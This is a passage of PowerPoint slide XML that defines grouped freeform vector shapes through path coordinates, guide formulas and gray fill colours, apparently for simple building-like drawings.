                          <a:lnTo>
                            <a:pt x="0" y="243"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="55" y="290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="848" y="78"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="905" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="848" y="16"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="A0A0A0"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="bg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6" name="Freeform 339"/>
                    <p:cNvSpPr>
                      <a:spLocks/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="1347" y="661"/>
                      <a:ext cx="27" cy="851"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 57"/>
                        <a:gd name="T1" fmla="*/ 78 h 1774"/>
                        <a:gd name="T2" fmla="*/ 0 w 57"/>
                        <a:gd name="T3" fmla="*/ 836 h 1774"/>
                        <a:gd name="T4" fmla="*/ 0 w 57"/>
                        <a:gd name="T5" fmla="*/ 836 h 1774"/>
                        <a:gd name="T6" fmla="*/ 0 w 57"/>
                        <a:gd name="T7" fmla="*/ 836 h 1774"/>
                        <a:gd name="T8" fmla="*/ 0 w 57"/>
                        <a:gd name="T9" fmla="*/ 1303 h 1774"/>
                        <a:gd name="T10" fmla="*/ 0 w 57"/>
                        <a:gd name="T11" fmla="*/ 1303 h 1774"/>
                        <a:gd name="T12" fmla="*/ 0 w 57"/>
                        <a:gd name="T13" fmla="*/ 1303 h 1774"/>
                        <a:gd name="T14" fmla="*/ 0 w 57"/>
                        <a:gd name="T15" fmla="*/ 1774 h 1774"/>
                        <a:gd name="T16" fmla="*/ 57 w 57"/>
                        <a:gd name="T17" fmla="*/ 1757 h 1774"/>
                        <a:gd name="T18" fmla="*/ 57 w 57"/>
                        <a:gd name="T19" fmla="*/ 0 h 1774"/>
                        <a:gd name="T20" fmla="*/ 0 w 57"/>
                        <a:gd name="T21" fmla="*/ 78 h 177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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="57" h="1774">
                          <a:moveTo>
                            <a:pt x="0" y="78"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="836"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="836"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="836"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1303"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1303"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1303"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1774"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="1757"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="78"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="A0A0A0"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="bg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907" name="Group 340"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1430" y="583"/>
                <a:ext cx="417" cy="426"/>
                <a:chOff x="1178" y="3085"/>
                <a:chExt cx="417" cy="426"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="914" name="Freeform 341"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1178" y="3085"/>
                  <a:ext cx="352" cy="395"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 733"/>
                    <a:gd name="T1" fmla="*/ 822 h 822"/>
                    <a:gd name="T2" fmla="*/ 0 w 733"/>
                    <a:gd name="T3" fmla="*/ 196 h 822"/>
                    <a:gd name="T4" fmla="*/ 733 w 733"/>
                    <a:gd name="T5" fmla="*/ 0 h 822"/>
                    <a:gd name="T6" fmla="*/ 733 w 733"/>
                    <a:gd name="T7" fmla="*/ 624 h 822"/>
                    <a:gd name="T8" fmla="*/ 0 w 733"/>
                    <a:gd name="T9" fmla="*/ 822 h 8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33" h="822">
                      <a:moveTo>
                        <a:pt x="0" y="822"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="733" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="733" y="624"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="822"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B6B6B6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15" name="Freeform 342"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1218" y="3133"/>
                  <a:ext cx="269" cy="304"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 560 w 560"/>
                    <a:gd name="T1" fmla="*/ 0 h 633"/>
                    <a:gd name="T2" fmla="*/ 560 w 560"/>
                    <a:gd name="T3" fmla="*/ 482 h 633"/>
                    <a:gd name="T4" fmla="*/ 0 w 560"/>
                    <a:gd name="T5" fmla="*/ 633 h 633"/>
                    <a:gd name="T6" fmla="*/ 0 w 560"/>
                    <a:gd name="T7" fmla="*/ 149 h 633"/>
                    <a:gd name="T8" fmla="*/ 560 w 560"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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0" h="633">
                      <a:moveTo>
                        <a:pt x="560" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="560" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="633"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="149"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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16" name="Freeform 343"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1178" y="3385"/>
                  <a:ext cx="417" cy="112"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 867"/>
                    <a:gd name="T1" fmla="*/ 198 h 234"/>
                    <a:gd name="T2" fmla="*/ 733 w 867"/>
                    <a:gd name="T3" fmla="*/ 0 h 234"/>
                    <a:gd name="T4" fmla="*/ 867 w 867"/>
                    <a:gd name="T5" fmla="*/ 35 h 234"/>
                    <a:gd name="T6" fmla="*/ 133 w 867"/>
                    <a:gd name="T7" fmla="*/ 234 h 234"/>
                    <a:gd name="T8" fmla="*/ 0 w 867"/>
                    <a:gd name="T9" fmla="*/ 198 h 2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67" h="234">
                      <a:moveTo>
                        <a:pt x="0" y="198"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="733" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="867" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="133" y="234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17" name="Freeform 344"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1242" y="3402"/>
                  <a:ext cx="353" cy="109"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 734"/>
                    <a:gd name="T1" fmla="*/ 199 h 227"/>
                    <a:gd name="T2" fmla="*/ 0 w 734"/>
                    <a:gd name="T3" fmla="*/ 227 h 227"/>
                    <a:gd name="T4" fmla="*/ 734 w 734"/>
                    <a:gd name="T5" fmla="*/ 28 h 227"/>
                    <a:gd name="T6" fmla="*/ 734 w 734"/>
                    <a:gd name="T7" fmla="*/ 0 h 227"/>
                    <a:gd name="T8" fmla="*/ 0 w 734"/>
                    <a:gd name="T9" fmla="*/ 199 h 2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34" h="227">
                      <a:moveTo>
                        <a:pt x="0" y="199"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="227"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="734" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="734" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282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18" name="Freeform 345"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1178" y="3480"/>
                  <a:ext cx="64" cy="31"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 133 w 133"/>
                    <a:gd name="T1" fmla="*/ 36 h 64"/>
                    <a:gd name="T2" fmla="*/ 133 w 133"/>
                    <a:gd name="T3" fmla="*/ 64 h 64"/>
                    <a:gd name="T4" fmla="*/ 0 w 133"/>
                    <a:gd name="T5" fmla="*/ 26 h 64"/>
                    <a:gd name="T6" fmla="*/ 0 w 133"/>
                    <a:gd name="T7" fmla="*/ 0 h 64"/>
                    <a:gd name="T8" fmla="*/ 133 w 133"/>
                    <a:gd name="T9" fmla="*/ 36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" h="64">
                      <a:moveTo>
                        <a:pt x="133" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="133" y="64"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="133" y="36"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282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08" name="Group 346"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="335" y="879"/>
                <a:ext cx="417" cy="426"/>
                <a:chOff x="1178" y="3085"/>
                <a:chExt cx="417" cy="426"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="909" name="Freeform 347"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1178" y="3085"/>
                  <a:ext cx="352" cy="395"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 733"/>
                    <a:gd name="T1" fmla="*/ 822 h 822"/>
                    <a:gd name="T2" fmla="*/ 0 w 733"/>
                    <a:gd name="T3" fmla="*/ 196 h 822"/>
                    <a:gd name="T4" fmla="*/ 733 w 733"/>
                    <a:gd name="T5" fmla="*/ 0 h 822"/>
                    <a:gd name="T6" fmla="*/ 733 w 733"/>
                    <a:gd name="T7" fmla="*/ 624 h 822"/>
                    <a:gd name="T8" fmla="*/ 0 w 733"/>
                    <a:gd name="T9" fmla="*/ 822 h 8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33" h="822">
                      <a:moveTo>
                        <a:pt x="0" y="822"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="733" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="733" y="624"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="822"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B6B6B6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10" name="Freeform 348"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1218" y="3133"/>
                  <a:ext cx="269" cy="304"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 560 w 560"/>
                    <a:gd name="T1" fmla="*/ 0 h 633"/>
                    <a:gd name="T2" fmla="*/ 560 w 560"/>
                    <a:gd name="T3" fmla="*/ 482 h 633"/>
                    <a:gd name="T4" fmla="*/ 0 w 560"/>
                    <a:gd name="T5" fmla="*/ 633 h 633"/>
                    <a:gd name="T6" fmla="*/ 0 w 560"/>
                    <a:gd name="T7" fmla="*/ 149 h 633"/>
                    <a:gd name="T8" fmla="*/ 560 w 560"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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0" h="633">
                      <a:moveTo>
                        <a:pt x="560" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="560" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="633"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="149"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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11" name="Freeform 349"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1178" y="3385"/>
                  <a:ext cx="417" cy="112"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 867"/>
                    <a:gd name="T1" fmla="*/ 198 h 234"/>
                    <a:gd name="T2" fmla="*/ 733 w 867"/>
                    <a:gd name="T3" fmla="*/ 0 h 234"/>
                    <a:gd name="T4" fmla="*/ 867 w 867"/>
                    <a:gd name="T5" fmla="*/ 35 h 234"/>
                    <a:gd name="T6" fmla="*/ 133 w 867"/>
                    <a:gd name="T7" fmla="*/ 234 h 234"/>
                    <a:gd name="T8" fmla="*/ 0 w 867"/>
                    <a:gd name="T9" fmla="*/ 198 h 2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67" h="234">
                      <a:moveTo>
                        <a:pt x="0" y="198"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="733" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="867" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="133" y="234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12" name="Freeform 350"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1242" y="3402"/>
                  <a:ext cx="353" cy="109"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 734"/>
                    <a:gd name="T1" fmla="*/ 199 h 227"/>
                    <a:gd name="T2" fmla="*/ 0 w 734"/>
                    <a:gd name="T3" fmla="*/ 227 h 227"/>
                    <a:gd name="T4" fmla="*/ 734 w 734"/>
                    <a:gd name="T5" fmla="*/ 28 h 227"/>
                    <a:gd name="T6" fmla="*/ 734 w 734"/>
                    <a:gd name="T7" fmla="*/ 0 h 227"/>
                    <a:gd name="T8" fmla="*/ 0 w 734"/>
                    <a:gd name="T9" fmla="*/ 199 h 2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34" h="227">
                      <a:moveTo>
                        <a:pt x="0" y="199"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="227"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="734" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="734" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282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13" name="Freeform 351"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1178" y="3480"/>
                  <a:ext cx="64" cy="31"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 133 w 133"/>
                    <a:gd name="T1" fmla="*/ 36 h 64"/>
                    <a:gd name="T2" fmla="*/ 133 w 133"/>
                    <a:gd name="T3" fmla="*/ 64 h 64"/>
                    <a:gd name="T4" fmla="*/ 0 w 133"/>
                    <a:gd name="T5" fmla="*/ 26 h 64"/>
                    <a:gd name="T6" fmla="*/ 0 w 133"/>
                    <a:gd name="T7" fmla="*/ 0 h 64"/>
                    <a:gd name="T8" fmla="*/ 133 w 133"/>
                    <a:gd name="T9" fmla="*/ 36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" h="64">
                      <a:moveTo>
                        <a:pt x="133" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="133" y="64"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="133" y="36"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282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27" name="Group 570"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5395969" y="2558765"/>
              <a:ext cx="1014412" cy="968375"/>
              <a:chOff x="80" y="2"/>
              <a:chExt cx="1939" cy="1851"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="928" name="Freeform 571"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1247" y="511"/>
                <a:ext cx="100" cy="1002"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 208"/>
                  <a:gd name="T1" fmla="*/ 0 h 2088"/>
                  <a:gd name="T2" fmla="*/ 0 w 208"/>
                  <a:gd name="T3" fmla="*/ 1698 h 2088"/>
                  <a:gd name="T4" fmla="*/ 208 w 208"/>
                  <a:gd name="T5" fmla="*/ 2088 h 2088"/>
                  <a:gd name="T6" fmla="*/ 208 w 208"/>
                  <a:gd name="T7" fmla="*/ 390 h 2088"/>
                  <a:gd name="T8" fmla="*/ 0 w 208"/>
                  <a:gd name="T9" fmla="*/ 0 h 20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8" h="2088">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="2088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="39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6B6B6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929" name="Group 572"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="80" y="2"/>
                <a:ext cx="1939" cy="1851"/>
                <a:chOff x="80" y="2"/>
                <a:chExt cx="1939" cy="1851"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="930" name="Freeform 573"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="80" y="2"/>
                  <a:ext cx="1939" cy="1851"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4042"/>
                    <a:gd name="T1" fmla="*/ 1084 h 3858"/>
                    <a:gd name="T2" fmla="*/ 0 w 4042"/>
                    <a:gd name="T3" fmla="*/ 3858 h 3858"/>
                    <a:gd name="T4" fmla="*/ 1848 w 4042"/>
                    <a:gd name="T5" fmla="*/ 3361 h 3858"/>
                    <a:gd name="T6" fmla="*/ 1848 w 4042"/>
                    <a:gd name="T7" fmla="*/ 1661 h 3858"/>
                    <a:gd name="T8" fmla="*/ 2641 w 4042"/>
                    <a:gd name="T9" fmla="*/ 1448 h 3858"/>
                    <a:gd name="T10" fmla="*/ 2641 w 4042"/>
                    <a:gd name="T11" fmla="*/ 3149 h 3858"/>
                    <a:gd name="T12" fmla="*/ 4042 w 4042"/>
                    <a:gd name="T13" fmla="*/ 2773 h 3858"/>
                    <a:gd name="T14" fmla="*/ 4042 w 4042"/>
                    <a:gd name="T15" fmla="*/ 0 h 3858"/>
                    <a:gd name="T16" fmla="*/ 0 w 4042"/>
                    <a:gd name="T17" fmla="*/ 1084 h 38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042" h="3858">
                      <a:moveTo>
                        <a:pt x="0" y="1084"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3858"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1848" y="3361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1848" y="1661"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2641" y="1448"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2641" y="3149"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4042" y="2773"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4042" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1084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931" name="Group 574"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="940" y="661"/>
                  <a:ext cx="434" cy="959"/>
                  <a:chOff x="940" y="661"/>
                  <a:chExt cx="434" cy="959"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="932" name="Freeform 575"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1264" y="928"/>
                    <a:ext cx="16" cy="43"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 33 w 33"/>
                      <a:gd name="T1" fmla="*/ 61 h 90"/>
                      <a:gd name="T2" fmla="*/ 0 w 33"/>
                      <a:gd name="T3" fmla="*/ 0 h 90"/>
                      <a:gd name="T4" fmla="*/ 0 w 33"/>
                      <a:gd name="T5" fmla="*/ 59 h 90"/>
                      <a:gd name="T6" fmla="*/ 12 w 33"/>
                      <a:gd name="T7" fmla="*/ 85 h 90"/>
                      <a:gd name="T8" fmla="*/ 12 w 33"/>
                      <a:gd name="T9" fmla="*/ 50 h 90"/>
                      <a:gd name="T10" fmla="*/ 33 w 33"/>
                      <a:gd name="T11" fmla="*/ 90 h 90"/>
                      <a:gd name="T12" fmla="*/ 33 w 33"/>
                      <a:gd name="T13" fmla="*/ 61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3" h="90">
                        <a:moveTo>
                          <a:pt x="33" y="61"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="59"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="85"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="50"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="90"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="61"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="A0A0A0"/>
                  </a:solidFill>
                  <a:ln w="6350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33" name="Freeform 576"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="940" y="777"/>
                    <a:ext cx="27" cy="843"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 55"/>
                      <a:gd name="T1" fmla="*/ 0 h 1757"/>
                      <a:gd name="T2" fmla="*/ 0 w 55"/>
                      <a:gd name="T3" fmla="*/ 822 h 1757"/>
                      <a:gd name="T4" fmla="*/ 0 w 55"/>
                      <a:gd name="T5" fmla="*/ 822 h 1757"/>
                      <a:gd name="T6" fmla="*/ 0 w 55"/>
                      <a:gd name="T7" fmla="*/ 822 h 1757"/>
                      <a:gd name="T8" fmla="*/ 0 w 55"/>
                      <a:gd name="T9" fmla="*/ 1290 h 1757"/>
                      <a:gd name="T10" fmla="*/ 0 w 55"/>
                      <a:gd name="T11" fmla="*/ 1290 h 1757"/>
                      <a:gd name="T12" fmla="*/ 0 w 55"/>
                      <a:gd name="T13" fmla="*/ 1290 h 1757"/>
                      <a:gd name="T14" fmla="*/ 0 w 55"/>
                      <a:gd name="T15" fmla="*/ 1757 h 1757"/>
                      <a:gd name="T16" fmla="*/ 55 w 55"/>
                      <a:gd name="T17" fmla="*/ 1743 h 1757"/>
                      <a:gd name="T18" fmla="*/ 55 w 55"/>
                      <a:gd name="T19" fmla="*/ 47 h 1757"/>
                      <a:gd name="T20" fmla="*/ 0 w 55"/>
                      <a:gd name="T21" fmla="*/ 0 h 17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5" h="1757">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="822"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="822"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="822"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1757"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="1743"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="4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A0A0"/>
                  </a:solidFill>
                  <a:ln w="6350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34" name="Freeform 577"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="940" y="661"/>
                    <a:ext cx="434" cy="139"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 848 w 905"/>
                      <a:gd name="T1" fmla="*/ 16 h 290"/>
                      <a:gd name="T2" fmla="*/ 0 w 905"/>
                      <a:gd name="T3" fmla="*/ 243 h 290"/>
                      <a:gd name="T4" fmla="*/ 55 w 905"/>
                      <a:gd name="T5" fmla="*/ 290 h 290"/>
                      <a:gd name="T6" fmla="*/ 848 w 905"/>
                      <a:gd name="T7" fmla="*/ 78 h 290"/>
                      <a:gd name="T8" fmla="*/ 905 w 905"/>
                      <a:gd name="T9" fmla="*/ 0 h 290"/>
                      <a:gd name="T10" fmla="*/ 848 w 905"/>
                      <a:gd name="T11" fmla="*/ 16 h 2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905" h="290">
                        <a:moveTo>
                          <a:pt x="848" y="16"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="243"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="848" y="78"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="905" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="848" y="16"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="A0A0A0"/>
                  </a:solidFill>
                  <a:ln w="6350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35" name="Freeform 578"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1347" y="661"/>
